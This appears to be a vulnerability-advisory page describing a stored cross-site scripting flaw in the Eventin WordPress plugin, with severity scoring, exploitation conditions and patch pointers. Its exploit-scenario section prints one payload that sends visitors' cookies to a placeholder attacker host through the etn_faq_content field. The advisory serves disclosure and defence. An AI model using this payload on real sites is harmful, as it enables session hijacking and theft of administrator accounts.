Severity by source
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Network-delivered stored XSS (AV:N/AC:L) requires contributor-level WordPress account (PR:L); payload executes cross-context in victims' browsers (S:C); no availability impact.
Primary rating from Vendor (Wordfence).
CVSS VectorVendor: Wordfence
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
The Eventin - Event Calendar, Event Registration, Tickets & Booking (AI Powered) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'etn_faq_content' parameter in all versions up to, and including, 4.1.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
AnalysisAI
Stored cross-site scripting in the Eventin WordPress event management plugin (all versions through 4.1.15) lets any contributor-level user permanently embed malicious JavaScript in event FAQ sections via the unescaped etn_faq_content parameter. The CVSS scope change (S:C) confirms the impact crosses the attacker's security context - injected scripts execute in any visitor's browser who loads the affected event page, enabling session hijacking or credential harvesting of higher-privileged users including site administrators. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Requires an authenticated WordPress session with at minimum contributor-level role on the target site - typically the 'Contributor', 'Author', 'Editor', or 'Administrator' WordPress roles can create or edit event posts via the Eventin plugin. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 6.4 score reflects a moderate-severity stored XSS with scope change. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with a WordPress contributor account navigates to the event editor and submits a crafted payload such as `<script>fetch('https://attacker.example/steal?c='+document.cookie)</script>` in the `etn_faq_content` field of an event's FAQ section. The payload is stored without sanitization and rendered without output escaping in the event detail templates. … |
| Remediation | Upstream fix available via WordPress SVN changeset revision 3600977 (https://plugins.trac.wordpress.org/changeset?reponame=&old=3600977%40wp-event-solution&new=3600977%40wp-event-solution); however, the exact patched release version number is not confirmed from the available data - update to the latest version in the WordPress plugin directory and verify the installed version exceeds 4.1.15. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-42843
GHSA-j2h9-v293-4vf9